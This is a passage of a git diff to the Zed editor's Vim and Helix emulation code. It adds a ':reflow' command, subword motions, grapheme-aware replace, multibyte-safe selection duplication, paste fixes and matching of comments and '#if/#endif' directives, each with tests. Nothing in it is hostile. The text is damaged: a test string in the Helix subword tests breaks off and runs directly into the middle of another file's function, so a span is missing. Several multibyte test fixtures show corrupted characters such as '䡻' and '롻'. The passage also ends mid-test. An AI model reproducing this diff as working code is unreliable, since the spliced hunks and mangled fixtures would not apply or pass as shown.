workspace::ActivatePreviousItem).count(), + VimCommand::new(("bn", "ext"), workspace::ActivateNextItem::default()).count(), + VimCommand::new(("bN", "ext"), workspace::ActivatePreviousItem::default()).count(), + 
VimCommand::new( + ("bp", "revious"), + workspace::ActivatePreviousItem::default(), + ) + .count(), VimCommand::new(("bf", "irst"), workspace::ActivateItem(0)), VimCommand::new(("br", "ewind"), workspace::ActivateItem(0)), VimCommand::new(("bl", "ast"), workspace::ActivateLastItem), @@ -1669,9 +1674,13 @@ fn generate_commands(_: &App) -> Vec { VimCommand::str(("ls", ""), "tab_switcher::ToggleAll"), VimCommand::new(("new", ""), workspace::NewFileSplitHorizontal), VimCommand::new(("vne", "w"), workspace::NewFileSplitVertical), - VimCommand::new(("tabn", "ext"), workspace::ActivateNextItem).count(), - VimCommand::new(("tabp", "revious"), workspace::ActivatePreviousItem).count(), - VimCommand::new(("tabN", "ext"), workspace::ActivatePreviousItem).count(), + VimCommand::new(("tabn", "ext"), workspace::ActivateNextItem::default()).count(), + VimCommand::new( + ("tabp", "revious"), + workspace::ActivatePreviousItem::default(), + ) + .count(), + VimCommand::new(("tabN", "ext"), workspace::ActivatePreviousItem::default()).count(), VimCommand::new( ("tabc", "lose"), workspace::CloseActiveItem { @@ -1725,6 +1734,15 @@ fn generate_commands(_: &App) -> Vec { ) .range(wrap_count), VimCommand::new(("j", "oin"), JoinLines).range(select_range), + VimCommand::new(("reflow", ""), Rewrap { line_length: None }) + .range(select_range) + .args(|_action, args| { + args.parse::().map_or(None, |length| { + Some(Box::new(Rewrap { + line_length: Some(length), + })) + }) + }), VimCommand::new(("fo", "ld"), editor::actions::FoldSelectedRanges).range(act_on_range), VimCommand::new(("foldo", "pen"), editor::actions::UnfoldLines) .bang(editor::actions::UnfoldRecursive) @@ -2318,7 +2336,7 @@ impl Vim { match c { '%' => { self.update_editor(cx, |_, editor, cx| { - if let Some((_, buffer, _)) = editor.active_excerpt(cx) + if let Some(buffer) = editor.active_buffer(cx) && let Some(file) = buffer.read(cx).file() && let Some(local) = file.as_local() { @@ -2479,6 +2497,7 @@ impl ShellExec { show_summary: 
false, show_command: false, show_rerun: false, + save: SaveStrategy::default(), }; let task_status = workspace.spawn_in_terminal(spawn_in_terminal, window, cx); @@ -3536,4 +3555,88 @@ mod test { Mode::Normal, ); } + + #[gpui::test] + async fn test_reflow(cx: &mut TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.update_editor(|editor, _window, cx| { + editor.set_hard_wrap(Some(10), cx); + }); + + cx.set_state( + indoc! {" + ˇ0123456789 0123456789 + "}, + Mode::Normal, + ); + + cx.simulate_keystrokes(": reflow"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + 0123456789 + ˇ0123456789 + "}, + Mode::Normal, + ); + + cx.set_state( + indoc! {" + ˇ0123456789 0123456789 + "}, + Mode::VisualLine, + ); + + cx.simulate_keystrokes("shift-v : reflow"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + 0123456789 + ˇ0123456789 + "}, + Mode::Normal, + ); + + cx.set_state( + indoc! {" + ˇ0123 4567 0123 4567 + "}, + Mode::VisualLine, + ); + + cx.simulate_keystrokes(": reflow space 7"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + ˇ0123 + 4567 + 0123 + 4567 + "}, + Mode::Normal, + ); + + // Assert that, if `:reflow` is invoked with an invalid argument, it + // does not actually have any effect in the buffer's contents. + cx.set_state( + indoc! {" + ˇ0123 4567 0123 4567 + "}, + Mode::VisualLine, + ); + + cx.simulate_keystrokes(": reflow space a"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + ˇ0123 4567 0123 4567 + "}, + Mode::VisualLine, + ); + } } diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index 126683f0b419ae9a44d17d90d760f06b106fad8a..923bd8c6a057819129b29b86e559c79a30f011f9 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -36,6 +36,8 @@ actions!( HelixInsert, /// Appends at the end of the selection. HelixAppend, + /// Inserts at the end of the current Helix cursor line. 
+ HelixInsertEndOfLine, /// Goes to the location of the last modification. HelixGotoLastModification, /// Select entire line or multiple lines, extending downwards. @@ -64,6 +66,7 @@ pub fn register(editor: &mut Editor, cx: &mut Context) { Vim::action(editor, cx, Vim::helix_select_lines); Vim::action(editor, cx, Vim::helix_insert); Vim::action(editor, cx, Vim::helix_append); + Vim::action(editor, cx, Vim::helix_insert_end_of_line); Vim::action(editor, cx, Vim::helix_yank); Vim::action(editor, cx, Vim::helix_goto_last_modification); Vim::action(editor, cx, Vim::helix_paste); @@ -363,6 +366,56 @@ impl Vim { } } + /// When `reversed` is true (used with `helix_find_range_backward`), the + /// `left` and `right` characters are yielded in reverse text order, so the + /// camelCase transition check must be flipped accordingly. + fn subword_boundary_start( + ignore_punctuation: bool, + reversed: bool, + ) -> impl FnMut(char, char, &CharClassifier) -> bool { + move |left, right, classifier| { + let left_kind = classifier.kind_with(left, ignore_punctuation); + let right_kind = classifier.kind_with(right, ignore_punctuation); + let at_newline = (left == '\n') ^ (right == '\n'); + let is_separator = |c: char| "_$=".contains(c); + + let is_word = left_kind != right_kind && right_kind != CharKind::Whitespace; + let is_subword = (is_separator(left) && !is_separator(right)) + || if reversed { + right.is_lowercase() && left.is_uppercase() + } else { + left.is_lowercase() && right.is_uppercase() + }; + + is_word || (is_subword && !right.is_whitespace()) || at_newline + } + } + + /// When `reversed` is true (used with `helix_find_range_backward`), the + /// `left` and `right` characters are yielded in reverse text order, so the + /// camelCase transition check must be flipped accordingly. 
+ fn subword_boundary_end( + ignore_punctuation: bool, + reversed: bool, + ) -> impl FnMut(char, char, &CharClassifier) -> bool { + move |left, right, classifier| { + let left_kind = classifier.kind_with(left, ignore_punctuation); + let right_kind = classifier.kind_with(right, ignore_punctuation); + let at_newline = (left == '\n') ^ (right == '\n'); + let is_separator = |c: char| "_$=".contains(c); + + let is_word = left_kind != right_kind && left_kind != CharKind::Whitespace; + let is_subword = (!is_separator(left) && is_separator(right)) + || if reversed { + right.is_lowercase() && left.is_uppercase() + } else { + left.is_lowercase() && right.is_uppercase() + }; + + is_word || (is_subword && !left.is_whitespace()) || at_newline + } + } + pub fn helix_move_cursor( &mut self, motion: Motion, @@ -387,6 +440,29 @@ impl Vim { let mut is_boundary = Self::is_boundary_right(ignore_punctuation); self.helix_find_range_backward(times, window, cx, &mut is_boundary) } + // The subword motions implementation is based off of the same + // commands present in Helix itself, namely: + // + // * `move_next_sub_word_start` + // * `move_next_sub_word_end` + // * `move_prev_sub_word_start` + // * `move_prev_sub_word_end` + Motion::NextSubwordStart { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, false); + self.helix_find_range_forward(times, window, cx, &mut is_boundary) + } + Motion::NextSubwordEnd { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, false); + self.helix_find_range_forward(times, window, cx, &mut is_boundary) + } + Motion::PreviousSubwordStart { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, true); + self.helix_find_range_backward(times, window, cx, &mut is_boundary) + } + Motion::PreviousSubwordEnd { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, true); + 
self.helix_find_range_backward(times, window, cx, &mut is_boundary) + } Motion::EndOfLine { .. } => { // In Helix mode, EndOfLine should position cursor ON the last character, // not after it. We therefore need special handling for it. @@ -571,6 +647,7 @@ impl Vim { self.search = SearchState { direction: searchable::Direction::Next, count: 1, + cmd_f_search: false, prior_selections, prior_operator: self.operator_stack.last().cloned(), prior_mode: self.mode, @@ -600,44 +677,62 @@ impl Vim { }); } + /// Helix-specific implementation of `shift-a` that accounts for Helix's + /// selection model, where selecting a line with `x` creates a selection + /// from column 0 of the current row to column 0 of the next row, so the + /// default [`vim::normal::InsertEndOfLine`] would move the cursor to the + /// end of the wrong line. + fn helix_insert_end_of_line( + &mut self, + _: &HelixInsertEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.start_recording(cx); + self.switch_mode(Mode::Insert, false, window, cx); + self.update_editor(cx, |_, editor, cx| { + editor.change_selections(Default::default(), window, cx, |s| { + s.move_with(&mut |map, selection| { + let cursor = if !selection.is_empty() && !selection.reversed { + movement::left(map, selection.head()) + } else { + selection.head() + }; + selection + .collapse_to(motion::next_line_end(map, cursor, 1), SelectionGoal::None); + }); + }); + }); + } + pub fn helix_replace(&mut self, text: &str, window: &mut Window, cx: &mut Context) { self.update_editor(cx, |_, editor, cx| { editor.transact(window, cx, |editor, window, cx| { let display_map = editor.display_snapshot(cx); let selections = editor.selections.all_display(&display_map); - // Store selection info for positioning after edit - let selection_info: Vec<_> = selections - .iter() - .map(|selection| { - let range = selection.range(); - let start_offset = range.start.to_offset(&display_map, Bias::Left); - let end_offset = range.end.to_offset(&display_map, 
Bias::Left); - let was_empty = range.is_empty(); - let was_reversed = selection.reversed; - ( - display_map.buffer_snapshot().anchor_before(start_offset), - end_offset - start_offset, - was_empty, - was_reversed, - ) - }) - .collect(); - let mut edits = Vec::new(); + let mut selection_info = Vec::new(); for selection in &selections { let mut range = selection.range(); + let was_empty = range.is_empty(); + let was_reversed = selection.reversed; - // For empty selections, extend to replace one character - if range.is_empty() { + if was_empty { range.end = movement::saturating_right(&display_map, range.start); } let byte_range = range.start.to_offset(&display_map, Bias::Left) ..range.end.to_offset(&display_map, Bias::Left); + let snapshot = display_map.buffer_snapshot(); + let grapheme_count = snapshot.grapheme_count_for_range(&byte_range); + let anchor = snapshot.anchor_before(byte_range.start); + + selection_info.push((anchor, grapheme_count, was_empty, was_reversed)); + if !byte_range.is_empty() { - let replacement_text = text.repeat(byte_range.end - byte_range.start); + let replacement_text = text.repeat(grapheme_count); edits.push((byte_range, replacement_text)); } } @@ -648,14 +743,12 @@ impl Vim { let snapshot = editor.buffer().read(cx).snapshot(cx); let ranges: Vec<_> = selection_info .into_iter() - .map(|(start_anchor, original_len, was_empty, was_reversed)| { + .map(|(start_anchor, grapheme_count, was_empty, was_reversed)| { let start_point = start_anchor.to_point(&snapshot); if was_empty { - // For cursor-only, collapse to start start_point..start_point } else { - // For selections, span the replaced text - let replacement_len = text.len() * original_len; + let replacement_len = text.len() * grapheme_count; let end_offset = start_anchor.to_offset(&snapshot) + replacement_len; let end_point = snapshot.offset_to_point(end_offset); if was_reversed { @@ -845,11 +938,18 @@ impl Vim { self.update_editor(cx, |_vim, editor, cx| { let snapshot = 
editor.snapshot(window, cx); editor.change_selections(SelectionEffects::default(), window, cx, |s| { - s.select_anchor_ranges( + let buffer = snapshot.buffer_snapshot(); + + s.select_ranges( prior_selections .iter() .cloned() - .chain(s.all_anchors(&snapshot).iter().map(|s| s.range())), + .chain(s.all_anchors(&snapshot).iter().map(|s| s.range())) + .map(|range| { + let start = range.start.to_offset(buffer); + let end = range.end.to_offset(buffer); + start..end + }), ); }) }); @@ -859,7 +959,7 @@ impl Vim { #[cfg(test)] mod test { - use gpui::{UpdateGlobal, VisualTestContext}; + use gpui::{KeyBinding, UpdateGlobal, VisualTestContext}; use indoc::indoc; use project::FakeFs; use search::{ProjectSearchView, project_search}; @@ -932,6 +1032,310 @@ mod test { cx.assert_state("aa\n«ˇ »bb", Mode::HelixNormal); } + #[gpui::test] + async fn test_next_subword_start(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + + // Setup custom keybindings for subword motions so we can use the bindings + // in `simulate_keystroke`. 
+ cx.update(|_window, cx| { + cx.bind_keys([KeyBinding::new( + "w", + crate::motion::NextSubwordStart { + ignore_punctuation: false, + }, + None, + )]); + }); + + cx.set_state("ˇfoo.bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ».bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«.ˇ»bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo.«barˇ»", Mode::HelixNormal); + + cx.set_state("ˇfoo(bar)", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ»(bar)", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«(ˇ»bar)", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo(«barˇ»)", Mode::HelixNormal); + + cx.set_state("ˇfoo_bar_baz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«foo_ˇ»bar_baz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo_«bar_ˇ»baz", Mode::HelixNormal); + + cx.set_state("ˇfooBarBaz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ»BarBaz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«Barˇ»Baz", Mode::HelixNormal); + + cx.set_state("ˇfoo;bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ»;bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«;ˇ»bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo;«barˇ»", Mode::HelixNormal); + + cx.set_state("ˇ, ) { - self.duplicate_selections( - times, - window, - cx, - &|prev_point| *prev_point.row_mut() += 1, - &|prev_range, map| prev_range.end.row() >= map.max_point().row(), - false, - ); + self.duplicate_selections(times, window, cx, Direction::Below); } /// Creates a duplicate of every selection above it in the first place that has both its start @@ -34,14 +35,7 @@ impl Vim { window: &mut Window, cx: &mut Context, ) { - self.duplicate_selections( - times, - window, - cx, - 
&|prev_point| *prev_point.row_mut() = prev_point.row().0.saturating_sub(1), - &|prev_range, _| prev_range.start.row() == DisplayPoint::zero().row(), - true, - ); + self.duplicate_selections(times, window, cx, Direction::Above); } fn duplicate_selections( @@ -49,9 +43,7 @@ impl Vim { times: Option, window: &mut Window, cx: &mut Context, - advance_search: &dyn Fn(&mut DisplayPoint), - end_search: &dyn Fn(&Range, &DisplaySnapshot) -> bool, - above: bool, + direction: Direction, ) { let times = times.unwrap_or(1); self.update_editor(cx, |_, editor, cx| { @@ -59,7 +51,7 @@ impl Vim { let map = editor.display_snapshot(cx); let mut original_selections = editor.selections.all_display(&map); // The order matters, because it is recorded when the selections are added. - if above { + if matches!(direction, Direction::Above) { original_selections.reverse(); } @@ -68,12 +60,9 @@ impl Vim { selections.push(display_point_range_to_offset_range(&origin, &map)); let mut last_origin = origin; for _ in 1..=times { - if let Some(duplicate) = find_next_valid_duplicate_space( - last_origin.clone(), - &map, - &advance_search, - &end_search, - ) { + if let Some(duplicate) = + find_next_valid_duplicate_space(last_origin.clone(), &map, direction) + { selections.push(display_point_range_to_offset_range(&duplicate, &map)); last_origin = duplicate; } else { @@ -90,22 +79,62 @@ impl Vim { } fn find_next_valid_duplicate_space( - mut origin: Range, + origin: Range, map: &DisplaySnapshot, - advance_search: &impl Fn(&mut DisplayPoint), - end_search: &impl Fn(&Range, &DisplaySnapshot) -> bool, + direction: Direction, ) -> Option> { - while !end_search(&origin, map) { - advance_search(&mut origin.start); - advance_search(&mut origin.end); + let buffer = map.buffer_snapshot(); + let start_col_utf16 = buffer + .point_to_point_utf16(origin.start.to_point(map)) + .column; + let end_col_utf16 = buffer.point_to_point_utf16(origin.end.to_point(map)).column; - if map.clip_point(origin.start, Bias::Left) == 
origin.start - && map.clip_point(origin.end, Bias::Right) == origin.end + let mut candidate = origin; + loop { + match direction { + Direction::Below => { + if candidate.end.row() >= map.max_point().row() { + return None; + } + *candidate.start.row_mut() += 1; + *candidate.end.row_mut() += 1; + } + Direction::Above => { + if candidate.start.row() == DisplayPoint::zero().row() { + return None; + } + *candidate.start.row_mut() = candidate.start.row().0.saturating_sub(1); + *candidate.end.row_mut() = candidate.end.row().0.saturating_sub(1); + } + } + + let start_row = DisplayPoint::new(candidate.start.row(), 0) + .to_point(map) + .row; + let end_row = DisplayPoint::new(candidate.end.row(), 0).to_point(map).row; + + if start_col_utf16 > buffer.line_len_utf16(MultiBufferRow(start_row)) + || end_col_utf16 > buffer.line_len_utf16(MultiBufferRow(end_row)) { - return Some(origin); + continue; + } + + let start_col = buffer + .point_utf16_to_point(PointUtf16::new(start_row, start_col_utf16)) + .column; + let end_col = buffer + .point_utf16_to_point(PointUtf16::new(end_row, end_col_utf16)) + .column; + + let candidate_start = DisplayPoint::new(candidate.start.row(), start_col); + let candidate_end = DisplayPoint::new(candidate.end.row(), end_col); + + if map.clip_point(candidate_start, Bias::Left) == candidate_start + && map.clip_point(candidate_end, Bias::Right) == candidate_end + { + return Some(candidate_start..candidate_end); } } - None } fn display_point_range_to_offset_range( @@ -231,4 +260,54 @@ mod tests { Mode::HelixNormal, ); } + + #[gpui::test] + async fn test_selection_duplication_multiline_multibyte(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + + // Multiline selection on rows with multibyte chars should preserve + // the visual column on both start and end rows. + cx.set_state( + indoc! 
{" + «H䡻llo + Hëllo + Hallo"}, + Mode::HelixNormal, + ); + + cx.simulate_keystrokes("C"); + + cx.assert_state( + indoc! {" + «H䡻llo + «H롻llo + Hallo"}, + Mode::HelixNormal, + ); + } + + #[gpui::test] + async fn test_selection_duplication_multibyte(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + + // Selection on a line with multibyte chars should duplicate to the + // same character column on the next line, not skip it. + cx.set_state( + indoc! {" + H«äˇ»llo + Hallo"}, + Mode::HelixNormal, + ); + + cx.simulate_keystrokes("C"); + + cx.assert_state( + indoc! {" + H«äˇ»llo + H«aˇ»llo"}, + Mode::HelixNormal, + ); + } } diff --git a/crates/vim/src/helix/paste.rs b/crates/vim/src/helix/paste.rs index 32f636b41046a5f8c8ade054594218890e23758f..c43281421462ee66e75d226b8769367f4db417b9 100644 --- a/crates/vim/src/helix/paste.rs +++ b/crates/vim/src/helix/paste.rs @@ -33,16 +33,14 @@ impl Vim { let selected_register = vim.selected_register.take(); - let Some((text, clipboard_selections)) = Vim::update_globals(cx, |globals, cx| { + let Some(register) = Vim::update_globals(cx, |globals, cx| { globals.read_register(selected_register, Some(editor), cx) }) - .and_then(|reg| { - (!reg.text.is_empty()) - .then_some(reg.text) - .zip(reg.clipboard_selections) - }) else { + .filter(|reg| !reg.text.is_empty()) else { return; }; + let text = register.text; + let clipboard_selections = register.clipboard_selections; let display_map = editor.display_snapshot(cx); let current_selections = editor.selections.all_adjusted_display(&display_map); @@ -63,7 +61,9 @@ impl Vim { let mut replacement_texts: Vec = Vec::new(); for ix in 0..current_selections.len() { - let to_insert = if let Some(clip_sel) = clipboard_selections.get(ix) { + let to_insert = if let Some(clip_sel) = + clipboard_selections.as_ref().and_then(|s| s.get(ix)) + { let end_offset = start_offset + clip_sel.len; let text = text[start_offset..end_offset].to_string(); 
start_offset = if clip_sel.is_entire_line { @@ -102,13 +102,16 @@ impl Vim { } else if action.before { sel.start } else if sel.start == sel.end { - // Helix and Zed differ in how they understand - // single-point cursors. In Helix, a single-point cursor - // is "on top" of some character, and pasting after that - // cursor means that the pasted content should go after - // that character. (If the cursor is at the end of a - // line, the pasted content goes on the next line.) - movement::right(&display_map, sel.end) + // In Helix, a single-point cursor is "on top" of a + // character, and pasting after means after that character. + // At line end this means the next line. But on an empty + // line there is no character, so paste at the cursor. + let right = movement::right(&display_map, sel.end); + if right.row() != sel.end.row() && sel.end.column() == 0 { + sel.end + } else { + right + } } else { sel.end }; @@ -146,8 +149,58 @@ impl Vim { mod test { use indoc::indoc; + use gpui::ClipboardItem; + use crate::{state::Mode, test::VimTestContext}; + #[gpui::test] + async fn test_system_clipboard_paste(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + cx.set_state( + indoc! {" + The quiˇck brown + fox jumps over + the lazy dog."}, + Mode::HelixNormal, + ); + + cx.write_to_clipboard(ClipboardItem::new_string("clipboard".to_string())); + cx.simulate_keystrokes("p"); + cx.assert_state( + indoc! {" + The quic«clipboardˇ»k brown + fox jumps over + the lazy dog."}, + Mode::HelixNormal, + ); + + // Multiple cursors with system clipboard (no metadata) pastes + // the same text at each cursor. + cx.set_state( + indoc! {" + ˇThe quick brown + fox ˇjumps over + the lazy dog."}, + Mode::HelixNormal, + ); + cx.write_to_clipboard(ClipboardItem::new_string("hi".to_string())); + cx.simulate_keystrokes("p"); + cx.assert_state( + indoc! 
{" + T«hiˇ»he quick brown + fox j«hiˇ»umps over + the lazy dog."}, + Mode::HelixNormal, + ); + + // Multiple cursors on empty lines should paste on those same lines. + cx.set_state("ˇ\nˇ\nˇ\nend", Mode::HelixNormal); + cx.write_to_clipboard(ClipboardItem::new_string("X".to_string())); + cx.simulate_keystrokes("p"); + cx.assert_state("«Xˇ»\n«Xˇ»\n«Xˇ»\nend", Mode::HelixNormal); + } + #[gpui::test] async fn test_paste(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; diff --git a/crates/vim/src/motion.rs b/crates/vim/src/motion.rs index 5161d77e06778091acd259994f1904b84e05acda..6e992704f54bf7aba3cc775d906a90281234dbd0 100644 --- a/crates/vim/src/motion.rs +++ b/crates/vim/src/motion.rs @@ -1,16 +1,18 @@ use editor::{ Anchor, Bias, BufferOffset, DisplayPoint, Editor, MultiBufferOffset, RowExt, ToOffset, + ToPoint as _, display_map::{DisplayRow, DisplaySnapshot, FoldPoint, ToDisplayPoint}, movement::{ self, FindRange, TextLayoutDetails, find_boundary, find_preceding_boundary_display_point, }, }; use gpui::{Action, Context, Window, actions, px}; -use language::{CharKind, Point, Selection, SelectionGoal}; +use language::{CharKind, Point, Selection, SelectionGoal, TextObject, TreeSitterOptions}; use multi_buffer::MultiBufferRow; use schemars::JsonSchema; use serde::Deserialize; use std::{f64, ops::Range}; + use workspace::searchable::Direction; use crate::{ @@ -1924,9 +1926,10 @@ fn next_subword_start( let found_subword_start = is_subword_start(left, right, ".$_-"); let is_word_start = (left_kind != right_kind) && (!right.is_ascii_punctuation() || is_stopping_punct(right)); + let found = (!right.is_whitespace() && (is_word_start || found_subword_start)) || at_newline && crossed_newline - || at_newline && left == '\n'; // Prevents skipping repeated empty lines + || right == '\n' && left == '\n'; // Prevents skipping repeated empty lines crossed_newline |= at_newline; found @@ -2339,39 +2342,19 @@ fn start_of_next_sentence( fn 
go_to_line(map: &DisplaySnapshot, display_point: DisplayPoint, line: usize) -> DisplayPoint { let point = map.display_point_to_point(display_point, Bias::Left); - let Some(mut excerpt) = map.buffer_snapshot().excerpt_containing(point..point) else { + let snapshot = map.buffer_snapshot(); + let Some((buffer_snapshot, _)) = snapshot.point_to_buffer_point(point) else { + return display_point; + }; + + let Some(anchor) = snapshot.anchor_in_excerpt(buffer_snapshot.anchor_after( + buffer_snapshot.clip_point(Point::new((line - 1) as u32, point.column), Bias::Left), + )) else { return display_point; }; - let offset = excerpt.buffer().point_to_offset( - excerpt - .buffer() - .clip_point(Point::new((line - 1) as u32, point.column), Bias::Left), - ); - let buffer_range = excerpt.buffer_range(); - if offset >= buffer_range.start.0 && offset <= buffer_range.end.0 { - let point = map - .buffer_snapshot() - .offset_to_point(excerpt.map_offset_from_buffer(BufferOffset(offset))); - return map.clip_point(map.point_to_display_point(point, Bias::Left), Bias::Left); - } - for (excerpt, buffer, range) in map.buffer_snapshot().excerpts() { - let excerpt_range = language::ToOffset::to_offset(&range.context.start, buffer) - ..language::ToOffset::to_offset(&range.context.end, buffer); - if offset >= excerpt_range.start && offset <= excerpt_range.end { - let text_anchor = buffer.anchor_after(offset); - let anchor = Anchor::in_buffer(excerpt, text_anchor); - return anchor.to_display_point(map); - } else if offset <= excerpt_range.start { - let anchor = Anchor::in_buffer(excerpt, range.context.start); - return anchor.to_display_point(map); - } - } map.clip_point( - map.point_to_display_point( - map.buffer_snapshot().clip_point(point, Bias::Left), - Bias::Left, - ), + map.point_to_display_point(anchor.to_point(snapshot), Bias::Left), Bias::Left, ) } @@ -2468,6 +2451,10 @@ fn find_matching_bracket_text_based( .take_while(|(_, char_offset)| *char_offset < line_range.end) .find_map(|(ch, 
char_offset)| get_bracket_pair(ch).map(|info| (info, char_offset))); + if bracket_info.is_none() { + return find_matching_c_preprocessor_directive(map, line_range); + } + let (open, close, is_opening) = bracket_info?.0; let bracket_offset = bracket_info?.1; @@ -2499,6 +2486,122 @@ fn find_matching_bracket_text_based( None } +fn find_matching_c_preprocessor_directive( + map: &DisplaySnapshot, + line_range: Range, +) -> Option { + let line_start = map + .buffer_chars_at(line_range.start) + .skip_while(|(c, _)| *c == ' ' || *c == '\t') + .map(|(c, _)| c) + .take(6) + .collect::(); + + if line_start.starts_with("#if") + || line_start.starts_with("#else") + || line_start.starts_with("#elif") + { + let mut depth = 0i32; + for (ch, char_offset) in map.buffer_chars_at(line_range.end) { + if ch != '\n' { + continue; + } + let mut line_offset = char_offset + '\n'.len_utf8(); + + // Skip leading whitespace + map.buffer_chars_at(line_offset) + .take_while(|(c, _)| *c == ' ' || *c == '\t') + .for_each(|(_, _)| line_offset += 1); + + // Check what directive starts the next line + let next_line_start = map + .buffer_chars_at(line_offset) + .map(|(c, _)| c) + .take(6) + .collect::(); + + if next_line_start.starts_with("#if") { + depth += 1; + } else if next_line_start.starts_with("#endif") { + if depth > 0 { + depth -= 1; + } else { + return Some(line_offset); + } + } else if next_line_start.starts_with("#else") || next_line_start.starts_with("#elif") { + if depth == 0 { + return Some(line_offset); + } + } + } + } else if line_start.starts_with("#endif") { + let mut depth = 0i32; + for (ch, char_offset) in + map.reverse_buffer_chars_at(line_range.start.saturating_sub_usize(1)) + { + let mut line_offset = if char_offset == MultiBufferOffset(0) { + MultiBufferOffset(0) + } else if ch != '\n' { + continue; + } else { + char_offset + '\n'.len_utf8() + }; + + // Skip leading whitespace + map.buffer_chars_at(line_offset) + .take_while(|(c, _)| *c == ' ' || *c == '\t') + .for_each(|(_, 
_)| line_offset += 1); + + // Check what directive starts this line + let line_start = map + .buffer_chars_at(line_offset) + .skip_while(|(c, _)| *c == ' ' || *c == '\t') + .map(|(c, _)| c) + .take(6) + .collect::(); + + if line_start.starts_with("\n\n") { + // empty line + continue; + } else if line_start.starts_with("#endif") { + depth += 1; + } else if line_start.starts_with("#if") { + if depth > 0 { + depth -= 1; + } else { + return Some(line_offset); + } + } + } + } + None +} + +fn comment_delimiter_pair( + map: &DisplaySnapshot, + offset: MultiBufferOffset, +) -> Option<(Range, Range)> { + let snapshot = map.buffer_snapshot(); + snapshot + .text_object_ranges(offset..offset, TreeSitterOptions::default()) + .find_map(|(range, obj)| { + if !matches!(obj, TextObject::InsideComment | TextObject::AroundComment) + || !range.contains(&offset) + { + return None; + } + + let mut chars = snapshot.chars_at(range.start); + if (Some('/'), Some('*')) != (chars.next(), chars.next()) { + return None; + } + + let open_range = range.start..range.start + 2usize; + let close_range = range.end - 2..range.end; + Some((open_range, close_range)) + }) +} + fn matching( map: &DisplaySnapshot, display_point: DisplayPoint, @@ -2626,6 +2729,32 @@ fn matching( continue; } + if let Some((open_range, close_range)) = comment_delimiter_pair(map, offset) { + if open_range.contains(&offset) { + return close_range.start.to_display_point(map); + } + + if close_range.contains(&offset) { + return open_range.start.to_display_point(map); + } + + let open_candidate = (open_range.start >= offset + && line_range.contains(&open_range.start)) + .then_some((open_range.start.saturating_sub(offset), close_range.start)); + + let close_candidate = (close_range.start >= offset + && line_range.contains(&close_range.start)) + .then_some((close_range.start.saturating_sub(offset), open_range.start)); + + if let Some((_, destination)) = [open_candidate, close_candidate] + .into_iter() + .flatten() + 
.min_by_key(|(distance, _)| *distance) + { + return destination.to_display_point(map); + } + } + closest_pair_destination .map(|destination| destination.to_display_point(map)) .unwrap_or_else(|| { @@ -3514,6 +3643,119 @@ mod test { ); } + #[gpui::test] + async fn test_matching_comments(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + + cx.set_shared_state(indoc! {r"ˇ/* + this is a comment + */"}) + .await; + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"/* + this is a comment + ˇ*/"}); + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"ˇ/* + this is a comment + */"}); + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"/* + this is a comment + ˇ*/"}); + + cx.set_shared_state("ˇ// comment").await; + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq("ˇ// comment"); + } + + #[gpui::test] + async fn test_matching_preprocessor_directives(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + + cx.set_shared_state(indoc! {r"#ˇif + + #else + + #endif + "}) + .await; + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"#if + + ˇ#else + + #endif + "}); + + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"#if + + #else + + ˇ#endif + "}); + + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"ˇ#if + + #else + + #endif + "}); + + cx.set_shared_state(indoc! {r" + #ˇif + #if + + #else + + #endif + + #else + #endif + "}) + .await; + + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r" + #if + #if + + #else + + #endif + + ˇ#else + #endif + "}); + + cx.simulate_shared_keystrokes("% %").await; + cx.shared_state().await.assert_eq(indoc! 
